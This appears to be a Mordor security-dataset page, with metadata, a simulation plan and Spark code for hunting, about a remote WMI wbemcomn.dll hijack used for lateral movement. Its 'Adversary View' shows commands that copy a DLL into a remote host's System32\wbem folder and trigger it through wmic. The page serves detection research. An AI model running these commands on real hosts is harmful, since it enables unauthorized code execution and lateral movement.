Covenant Remote WMI Wbemcomn DLL Hijacking

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/09

Modification Date

2020/10/09

Tactics

[‘TA0002’, ‘TA0008’]

Techniques

[‘T1047’]

Tags

[‘SMB CreateRequest’]

Dataset Description

This dataset represents adversaries abusing a DLL hijack vulnerability found in the execution of the WMI provider host (wmiprvse.exe) for lateral movement.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Threat Hunter Playbook

Remote WMI Wbemcomn DLL Hijack

https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

ShellCmd

Mordor shire

C2

Copy

Adversary View

Copy /source:"C:\ProgramData\test.dll" /destination:"\\WORKSTATION6\C$\Windows\System32\wbem\wbemcomn.dll"

ShellCmd /shellcommand:"wmic /node:WORKSTATION6 os get"

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/covenant_wmi_wbemcomn_dll_hijack.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |12     |2185 |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |10     |2089 |
|MORDORDC.theshire.local    |Security                                |4658   |785  |
|MORDORDC.theshire.local    |Security                                |4656   |393  |
|MORDORDC.theshire.local    |Security                                |4690   |393  |
|MORDORDC.theshire.local    |Security                                |4663   |365  |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |7      |361  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |294  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |193  |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4103   |169  |
|MORDORDC.theshire.local    |Windows PowerShell                      |800    |169  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |157  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |157  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |113  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |108  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |79   |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4105   |73   |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4106   |73   |
|MORDORDC.theshire.local    |Security                                |4703   |67   |
|MORDORDC.theshire.local    |Security                                |5156   |60   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows